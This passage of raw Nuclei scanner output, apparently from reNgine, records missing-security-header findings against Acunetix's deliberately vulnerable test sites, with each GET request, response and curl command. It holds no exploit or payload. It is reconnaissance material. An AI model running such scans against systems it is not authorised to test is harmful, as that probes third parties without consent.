href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.553548839Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.81601269Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.81603617Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.94908846Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.949147525Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.94915714Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.231853589Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.231898267Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.231910981Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.231897933Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.362728019Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 